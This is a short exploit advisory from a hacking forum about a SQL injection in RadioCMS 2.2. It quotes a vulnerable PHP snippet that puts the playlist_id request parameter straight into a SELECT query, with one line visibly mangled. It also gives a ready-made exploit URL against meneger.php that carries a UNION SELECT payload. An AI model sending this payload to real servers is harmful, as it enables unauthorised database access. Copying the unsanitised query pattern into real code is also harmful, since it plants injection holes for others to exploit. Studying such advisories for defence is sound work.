################################################# + + Title: RadioCMS 2.2 + Author: Rooster(XEKA) + Greetz to: Isis,luz3r,slider + Contact: forum.xeksec.com + ################################################# --[ Vuln Code ] -- ... if ($_GET['playlist_id']) { $playlist_id_get = ['playlist_id']; } ... if ($playlist_id != "") { $query = "SELECT * FROM `playlist` WHERE $playlist_id;"; ... ################################################ --[ Exploitable ]-- http://server/radio/meneger.php?fold=/var/www/music&search=1%27&playlist_id=&playlist_id=-1+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12 ################################################Брой прочитания на тази страница: 1099
RadioCMS 2.2 (menager.php, playlist_id param) – SQL Injection Vulnerability